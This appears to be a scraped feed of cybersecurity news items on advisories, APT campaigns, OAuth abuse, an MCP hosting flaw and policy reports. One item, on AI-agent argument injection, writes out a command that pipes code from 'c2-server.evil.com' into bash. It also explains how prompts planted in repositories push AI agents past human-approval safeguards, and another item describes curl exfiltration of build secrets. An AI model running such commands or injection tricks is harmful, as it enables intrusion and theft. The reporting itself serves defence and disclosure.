-
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical security flaw impacting Motex Lanscope Endpoint Manager to its Known Exploited Vulnerabilities (KEV) catalog, stating it has been actively exploited in the wild. The vulnerability, CVE-2025-61932 (CVSS v4 score: 9.3), impacts on-premises versions of Lanscope Endpoint Manager, specifically Client
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Satellite imaging company Vantor—formerly Maxar Intelligence—has signed a contract with the U.S. Space Force to help run a “neighborhood watch” in space to monitor for space-based threats like rogue satellites or debris that ground sensors may miss.
Under the new contract, Vantor will use satellites it already has in orbit to monitor space and protect U.S. satellites, helping provide a sort of “neighborhood watch” in low earth orbit, the increasingly crowded area of space between 99 to 1,200 miles above the surface, Susanne Hake, Vantor’s general manager for U.S. government, told Defense One in an email.
The program will use “Vantor’s existing imaging satellites on orbit,” she said. “We have 10 satellites, 7 of which can collect space-to-space imagery, also called non-Earth imagery.” Vantor did not disclose the value of the contract.
A brief timeline of new space weapons
During the Cold War, both the United States and the Soviet Union researched potential space-based weapons, but little came of the efforts. —other than a lot of radiation from one particularly dangerous U.S. experiment. In 2010, observers spotted two Chinese satellites performing a type of rendezvous in space, the purpose of which was unclear. As former U.S. Air Force officer Brian Weeden observed at the time, Russia soon followed suit with its own satellites that appeared to be conducting “rendezvous and proximity operations” with one another.
In July 2020, U.S. Space Command said Russia was conducting space-based anti-satellite tests. In March 2023, U.S. Space Force Chief Gen. Chance Saltzman told lawmakers that China was also “testing on-orbit satellite systems, which could be weaponized as they have already shown the capability to physically control and move other satellites.”
In March of this year, Space Force Vice Chief Gen. Michael Guetlein said the technology gap between the United States and China in space had significantly narrowed, and China was now rehearsing what appeared to be clear satellite military maneuvers, “dog fighting” in space.
These developments have increased demand for space-based intelligence and space situational awareness. But those needs exist alongside the need for more earth imaging generally and, soon, missile interceptor satellites.
To that end, Hake says that Vantor has figured out how to modify its existing satellites so that they can not only collect images of the Earth, but also track space objects to reveal possible maneuvers and proximity operations, or the presence of possible weapons.
“Our constellation is capable of imaging LEO objects at less than 6-inch resolution and can also support tracking of objects across a much wider space volume. We have imaged objects as small as 24 cm, or about 9.5 inches,” she said.
The satellite software can be updated from Earth, and Vantor next is looking to use automation to speed up the collection rate, allowing for more pictures and faster delivery.
“We’re aiming to collect as many as 1,000 [non-Earth] images a day. Most collections can be delivered in less than 4 hours—and many are delivered within 90 minutes.”
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cloud account takeover attacks have evolved into a sophisticated threat as cybercriminals and state-sponsored actors increasingly weaponize OAuth applications to establish persistent access within compromised environments.
These malicious actors are exploiting the fundamental trust mechanisms of cloud authentication systems, specifically targeting Microsoft Entra ID environments where they can hijack user accounts, conduct reconnaissance, exfiltrate sensitive data, and launch subsequent attacks with alarming effectiveness.
The security implications of this attack vector are particularly severe because attackers can create and authorize internal second-party applications with custom-defined scopes and permissions once they gain initial access to a cloud account.
This capability enables persistent access to critical organizational resources including mailboxes, SharePoint documents, OneDrive files, Teams messages, and calendar information.
Traditional security measures like password resets and multifactor authentication enforcement prove ineffective against these attacks, as the malicious OAuth applications maintain their authorized access independently of user credential changes.
Proofpoint analysts identified this emerging threat pattern through extensive research and real-world incident analysis, developing an automated toolkit that demonstrates how threat actors establish resilient backdoors within cloud environments.
Their investigation revealed that attackers typically gain initial access through reverse proxy toolkits accompanied by individualized phishing lures that enable the theft of both credentials and session cookies.
Once inside, attackers leverage the compromised account’s privileges to register new internal applications that appear as legitimate business resources within the organization’s tenant.
The persistence mechanism operates through a carefully orchestrated process where attackers create second-party applications that inherit implicit trust within the environment.
.webp)
Application creation process (Source – Proofpoint) These internal applications are more difficult to detect than third-party applications because they bypass security controls designed primarily for external application monitoring.
The malicious applications can remain undetected within the environment indefinitely unless specifically identified through proactive security auditing, creating a substantial window of opportunity for data exfiltration and reconnaissance activities.
Automated OAuth Persistence: Technical Implementation
The technical sophistication of these attacks becomes evident through automated OAuth application registration and configuration processes.
Attackers deploy tools that streamline post-exploitation activities, registering applications with pre-configured permission scopes aligned with their objectives.
A critical aspect involves establishing the compromised user account as the registered owner of the newly created application, effectively positioning it as a legitimate internal resource that inherits trust relationships associated with internal systems.
During the automated deployment, attackers generate cryptographic client secrets that serve as the application’s authentication credentials, typically configured with extended validity periods of up to two years.
.webp)
Tokens collected (Source – Proofpoint) The automation then collects multiple OAuth token types including access tokens, refresh tokens, and ID tokens, each serving distinct purposes in maintaining persistent access.
Proofpoint researchers documented a real-world incident where attackers operating through US-based VPN proxies created an internal application named ‘test’ with Mail.Read and offline_access permissions, maintaining access for four days even after the victim’s password was changed.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Hackers Weaponizing OAuth Applications for Persistent Cloud Access Even After Password Reset appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
"Our nation’s ability to protect itself and its allies from cyber threats is stalling and, in several areas, slipping," begins the summary of a landmark report by a congressionally chartered policy group.
The analysis — delivered Wednesday by the Cyberspace Solarium Commission 2.0 — tracks the consequences of hollowing out the federal cyber workforce amid the Trump administration's efforts to reorganize the government and make it more efficient in the eyes of the White House and top agency leaders.
"Nearly a quarter of fully implemented recommendations have lost that status — an unprecedented setback that underscores the fragility of progress,” the report's summary says.
The report urges the administration to restore workforce and funding to the Cybersecurity and Infrastructure Security Agency and cyber diplomacy staff within the State Department, both of which have been marked by significant cuts. The report also contends that the rollback of diversity, equity and inclusion initiatives in the second Trump administration have slowed the intake of skilled job candidates from nontraditional backgrounds, narrowing the government’s cyber talent pool.
Among the most grievous setbacks includes government work on countering disinformation and foreign malign influence, especially within the Department of Homeland Security, where CISA is housed. The Trump administration has framed that work largely as a censorship regime that’s suppressed Americans’ First Amendment rights.
Cyber foreign assistance — a core aspect of State Department operations and work under the now defunct U.S. Agency for International Development — has also regressed significantly, the report concludes.
The yearly findings have measured progress on goals outlined by the original Cyberspace Solarium Commission, which was established five years ago via legislation to build a governmentwide strategy for cybersecurity. The report is one of the few comprehensive blueprints that regularly examines nearly every arm of U.S. government work on cyber matters, including agencies, commissions, standards-setting bodies and research funding.
Mark Montgomery, a former Navy rear admiral who serves as senior director of FDD’s Center on Cyber and Technology Innovation, is most concerned by the cuts inside CISA. To date, around a third of the agency’s workforce has been terminated or left through deferred resignation and early retirement programs made available to its staff.
“35 years in the military, I never had a head or subordinate come up to me and say, ‘Sir, what I really need right now is a 35% reduction in workforce,’” Montgomery said at a Wednesday FDD event discussing the findings.
“I think [the CISA cuts] sting the most,” he added. “And I just wish they could get over it and say ‘We made a mistake, we’re putting the money back in there.’”
CSC has been deemed a major force behind contemporary U.S. cyber policy decisions. Lawmakers in the original commission — which included then-Reps. Jim Langevin, D-R.I., and Mike Gallagher, R-Wis., as well as Sen. Angus King, I-Maine — formed the backbone that created the Office of the National Cyber Director, which has helped the federal government pursue various cyber priorities. Sean Cairncross, the first national cyber director under Trump, was confirmed to his post in August.
Many of the elements that stood up under the CSC’s direction still exist but haven’t endured or been set on the right path, said Jiwon Ma, an FDD senior policy analyst who also authored the findings.
“I know that that is a strong language, but I think that we haven’t been doing well in terms of preparing,” said Ma. “We’re good at standing up things like the [Office of the National Cyber Director]. “We gave them funding, we brought the personnel, but then we didn’t consistently think about what it needed as it grew.”
ONCD in the past has had tensions with cyber elements in the National Security Council, both of which sit in the White House.
A White House spokesperson did not immediately return a request for comment. An automated email said there may be response delays due to the ongoing government shutdown.
At the Wednesday event, King, in prerecorded remarks, called the report’s results “frustrating.”
“At a time when we’re seeing the cyber threat increase dramatically, we’re unilaterally disarming, and we’re not making the progress that we ought to make,” he said.
On the sidelines of the event, Langevin told reporters that he hopes the Trump administration will give Cairncross and Sean Plankey — nominated but not yet confirmed to lead CISA — the runway they need to achieve their goals. Gallagher, also speaking with reporters, agreed and said he is “bullish” on the opportunity to hammer out mission sets across the government’s cyber enterprise.
Cybersecurity has been historically a bipartisan darling of Washington, but CISA, deemed the nation’s core civilian cyberdefense agency, has become a recent subject of political scuffles due to its prior work combatting mis- and disinformation.
The agency has faced scrutiny from the Trump administration for some time. Top officials have aimed to “refocus” its mission amidst GOP accusations that the agency engaged in censorship of Americans’ free speech. Those claims stem from CISA’s earlier collaboration with social media platforms to remove false information online concerning the COVID-19 pandemic, elections and other divisive subjects around 2020.
That dynamic has carried over to other offices handling cyber and disinfo work, including inside the State Department, FBI and Office of the Director of National Intelligence, which oversees that nation’s 18 spy agencies.
All told, the Trump cyber team is still getting into place, and the ongoing shutdown has slowed progress in those areas.
“I’m deeply concerned about the level of cuts. You have to have the people doing the job, and it’s really important that you continue to build capacity there. So I don’t know how they’re going to recover from [the reductions],” Langevin said. “But I’m willing to give the administration the benefit of the doubt that we are going to build that capacity and … continue the mission.”
]]>¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A critical vulnerability in Smithery.ai, a popular registry for Model Context Protocol (MCP) servers. This issue could have allowed attackers to steal from over 3,000 AI servers and take API keys from thousands of users across many services.
MCP powers AI apps by linking them to external tools and data, like local filesystems or remote databases. Servers come in local or remote flavors, with remote ones often self-hosted or fully managed by providers.
According to GitGuardian, Smithery.ai’s hybrid model simplifies deployment by hosting user-submitted servers on its infrastructure, built from GitHub repos into Docker images. But this convenience amplified the stakes: a single breach could ripple across an entire ecosystem of AI tools.
Exploiting a Simple Configuration Vulnerability
The flaw stemmed from lax controls in Smithery’s build process. Users submit a smithery.yaml file specifying the Docker build context via dockerBuildPath. Legit setups point inside the repo, but the system didn’t validate inputs, enabling path traversal attacks.
By setting dockerBuildPath to “..”, attackers could reference the builder machine’s home directory outside the repo, exposing sensitive files to a malicious Dockerfile.
In testing, GitGuardian crafted a repo named “test” with a rigged yaml and Dockerfile. The latter used curl to exfiltrate the directory tree to an attacker-controlled site, revealing files like .docker/config.json.
This file held an overprivileged fly.io authentication token, meant for Docker registry access but granting broader machine API privileges.
Fly.io powers Smithery’s hosting with virtualized containers, and the token unlocked an organization with 3,243 apps, mostly MCP servers, plus service infrastructure.
With the token, attackers could query apps, execute code on machines (confirming root access via “id” command), and even sniff network traffic.

Compromised Server key Capturing HTTP requests to a compromised server exposed client-sent API keys, like a Brave key in query params. Scaled up, this could harvest secrets from thousands of clients connecting to services via MCP servers, according to GitGuardian.
The incident highlights supply-chain perils in centralized AI hosting. MCP servers often rely on static API keys rather than OAuth, easing attacks but complicating privilege limits.
Echoing breaches like Salesloft’s OAuth abuse, it shows how one flaw enables lateral movement across trusts.
Smithery fixed the traversal on June 15, 2025, after disclosure on June 13, rotating keys and tightening builds. As AI ecosystems grow, such platforms must prioritize isolation to shield developers from ecosystem-wide threats.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Critical Vulnerability in MCP Server Platform Exposes 3,000+ Servers and Thousands of API Keys appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
The Iranian nation-state group known as MuddyWater has been attributed to a new campaign that has leveraged a compromised email account to distribute a backdoor called Phoenix to various organizations across the Middle East and North Africa (MENA) region, including over 100 government entities. The end goal of the campaign is to infiltrate high-value targets and facilitate intelligence gathering
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A critical argument injection flaw in three unnamed popular AI agent platforms enables attackers to bypass human approval safeguards and achieve remote code execution (RCE) through seemingly innocuous prompts.
According to Trail of Bits, these vulnerabilities exploit pre-approved system commands designed for efficiency in tasks like file searches and code analysis, highlighting a widespread design flaw in agentic AI systems.
AI agents rely on native tools such as find, grep, git, and go test to handle filesystem operations and version control without reinventing functionality, offering benefits in performance, reliability, and development speed.
However, these pre-approved commands create an attack surface when user inputs influence arguments, allowing argument injection as defined by CWE-88.
Systems often validate commands against allowlists but neglect argument flags, making blanket blocking impractical due to the vast parameter spaces of utilities.
For instance, a simplified Go function checks if a command like “grep” is safe but appends user-provided arguments unchecked, leaving room for exploitation.
This antipattern persists because selective filtering demands exhaustive knowledge of command options, a challenge amplified by AI’s dynamic nature.
In one CLI-based agent, attackers crafted a prompt to run “go test -exec ‘bash -c “curl c2-server.evil.com?unittest= | bash; echo success”‘”, leveraging the -exec flag to introduce unauthorized curl and bash commands, resulting in RCE without approval.
Another example bypassed regex filters by using git show with hex-encoded payloads to create a file, followed by ripgrep’s –pre flag to execute it, all through JSON-formatted prompts that nudged the model toward tool use, according to Trail of Bits.
Attack Patterns
A facade pattern vulnerability in a third system appended malicious flags like “-x=python3” to an fd command, executing a pre-created Python payload with os.system for arbitrary actions.
These one-shot attacks, embeddable in code comments or repositories, draw from “living off the land” techniques cataloged in GTFOBins and LOLBAS projects.
Prior disclosures, including Johann Rehberger’s August 2025 writeups on Amazon Q command injection and CVEs like CVE-2025-54795 in Claude Code, echo these risks.
To counter these threats, researchers advocate sandboxing as the primary defense, using containers, WebAssembly, or OS-level isolation like Seatbelt on macOS to limit agent access.
For facade patterns, always insert argument separators like “–” before user inputs and disable shell execution with methods like subprocess.run(shell=False).
Safe command allowlists remain flawed without sandboxes, as tools like find enable code execution via flags, urging audits against LOLBAS resources.
Developers should implement logging, reduce allowlists, and reintroduce human loops for suspicious chains; users must restrict access and use containers for untrusted inputs.
Security engineers can map tools via prompts or documentation, fuzz flags, and compare against exploit databases. As agentic AI proliferates, these coordinated disclosures signal a shift toward prioritizing security before entrenchment.
Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.
The post Critical Argument Injection Vulnerability in Popular AI Agents Let Attackers Execute Remote Code appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
QR codes used to be harmless, now they’re one of the sneakiest ways attackers slip past defenses. Quishing, or QR code phishing, hides malicious links inside innocent-looking images that filters can’t read.
One scan, and the victim lands on a fake login page designed to steal credentials or trigger a download; often from a mobile device completely outside your SOC’s visibility.
Why Quishing Is Hard to Catch
From a detection standpoint, Quishing breaks the usual rules. The phishing payload isn’t in the email body or attachment, it’s embedded inside an image as a QR code. That means:
- No clickable links for secure email gateways or URL filters to analyze.
- No obvious indicators for content inspection or heuristic engines.
- No telemetry once the user scans the code on a mobile device outside the corporate network.
Analyst’s New Weapon: Expose QR Phishing in Seconds
For SOC analysts, Quishing is a time sink and a blind spot. Traditional tools can’t scan QR codes and decoding them manually is slow and risky.
That’s why many teams now rely on interactive sandboxes like ANY.RUN to safely expose what’s hidden behind those codes without leaving the protected environment.
Instead of extracting images or using external decoders, the sandbox automatically detects and decodes QR codes from emails, PDFs, and screenshots.
It follows the resulting link in an isolated VM, giving analysts the full attack context, from payload delivery to network activity, in just seconds.
Real-World Example: Voicemail Scam Exposed in Under 60 Seconds
An email arrives claiming you’ve missed a voicemail. Instead of a link, it contains a QR code urging the user to “listen to the message.”
Check how sandbox exposes the hidden QR code

ANY.RUN sandbox exposing the malicious URL in seconds Once uploaded to ANY.RUN, the sandbox automatically detects and decodes the QR without manual extraction or third-party tools.
Reveal complex threats in seconds inside ANY.RUN’s interactive sandbox, cutting investigation time and turning hidden attacks into clear evidence -> Join ANY.RUN now
The decoded URL is displayed immediately in the Static Discovering section, and automated interactivity triggers a controlled browser session.

Malicious URL discovered in the Static discovering section inside ANY.RUN sandbox In 60 seconds, the sandbox discovered the full attack chain, surfacing relevant TTPs, exportable IOCs, network connections, and a shareable analysis report analysts can use to block, hunt, and write detections.

Well-structured report generated by ANY.RUN for easy sharing
Why SOC Analysts Choose ANY.RUN for Quishing Analysis
Quishing attacks are built to waste analyst time; ANY.RUN gives that time back. With automated QR detection, real-time interaction, and deep visibility, analysts can shift from manual decoding to instant validation.
- 90% of attacks exposed in under 60 seconds: The sandbox reveals hidden payloads, redirect chains, and credential-harvesting pages in seconds, cutting average triage time by more than half.
- Full visibility in one interface: Analysts see process trees, network traffic, and decoded URLs together; no switching between tools, no risk of missing a step.
- Automatic evidence collection: Every session generates IOCs, network indicators, and screenshots that can be exported or shared in a single click.
- Faster detection engineering: Verified TTPs and IOCs can be turned into new detection rules directly from the sandbox report.
- Safe handling environment: QR codes, phishing pages, and scripts execute only inside the isolated VM, analysts stay fully protected while observing real behavior.
- Collaborative workflows: Share sessions across the team or integrate with your SIEM, SOAR, or ticketing system to accelerate incident response.
Turn QR Phishing from a Blind Spot Into a 60-Second Investigation
Quishing doesn’t only test your defenses but also your efficiency. Analysts spend hours decoding images, validating links, and correlating telemetry that should already be visible.
ANY.RUN changes that balance, giving SOCs the kind of context they can act on instantly.
With automation built into every stage of analysis, SOC teams using ANY.RUN report measurable results:
- Up to 58% more threats identified overall, including those that bypass standard filters and static analysis.
- 94% of users report faster triage, thanks to automated IOC collection and ready-to-share reports.
- 95% of SOC teams speed up investigations, connecting decoded URLs, network traffic, and threat behavior in one workflow.
Try ANY.RUN to uncover hidden phishing payloads, decode QR attacks safely, and turn every investigation into actionable insight.The post SOCs Have a Quishing Problem: Here’s How to Solve It appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cybersecurity researchers have disclosed details of a coordinated spear-phishing campaign dubbed PhantomCaptcha targeting organizations associated with Ukraine’s war relief efforts to deliver a remote access trojan that uses a WebSocket for command-and-control (C2). The activity, which took place on October 8, 2025, targeted individual members of the International Red Cross, Norwegian Refugee
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A sophisticated cyberespionage campaign dubbed PassiveNeuron has resurfaced with infections targeting government, financial, and industrial organizations across Asia, Africa, and Latin America.
First detected in 2024, the campaign remained dormant for six months before re-emerging in December 2024, with the latest infections observed as recently as August 2025.
The threat involves deploying previously unknown advanced persistent threat implants named Neursite and NeuralExecutor, alongside the Cobalt Strike framework, to compromise Windows Server machines.
The attackers primarily exploit Microsoft SQL servers to gain initial remote command execution on target systems. Once access is obtained through SQL vulnerabilities, injection flaws, or compromised database credentials, threat actors attempt deploying ASPX web shells for sustained access.
However, the deployment has proven challenging, with security solutions frequently blocking their attempts. Attackers have adapted by using Base64 and hexadecimal encoding, switching between PowerShell and VBS scripts, and writing payloads line-by-line to evade detection.
Securelist researchers identified that the campaign employs a sophisticated multi-stage infection chain, with malicious implants loaded through DLL loaders.
The first-stage loaders are strategically placed in the System32 directory with names like wlbsctrl.dll, TSMSISrv.dll, and oci.dll, exploiting the Phantom DLL Hijacking technique to achieve automatic persistence upon startup.
.webp)
These DLLs are artificially inflated to exceed 100 MB by adding junk overlay bytes, making them difficult for security solutions to detect.
The loaders incorporate advanced anti-analysis mechanisms, including MAC address validation to ensure execution only on intended victim machines.
The first-stage loader iterates through installed network adapters, calculating a 32-bit hash of each MAC address and comparing it against hardcoded configuration values.
If no match is found, the loader exits immediately, preventing execution in sandbox environments and confirming the highly targeted nature of this campaign.
Multi-Stage Payload Delivery
The PassiveNeuron infection chain follows a complex four-stage loading process. After the first-stage loader validates the target machine, it loads a second-stage DLL from disk with file sizes exceeding 60 MB.
.webp)
Function names found inside NeuralExecutor (Source – Securelist) This loader opens a text file containing Base64-encoded and AES-encrypted data with the third-stage loader. The third-stage payload launches a fourth-stage shellcode loader inside legitimate processes like WmiPrvSE.exe or msiexec.exe, created in suspended mode.
The Neursite backdoor represents the most potent final-stage implant, featuring modular capabilities for system reconnaissance, process management, lateral movement, and file operations.
Attribution analysis points toward Chinese-speaking threat actors, supported by Dead Drop Resolver techniques via GitHub repositories and tactics associated with APT31, APT27, and potentially APT41 groups.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post New PassiveNeuron Attacking Servers of High-Profile Organizations to Implant Malware appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶


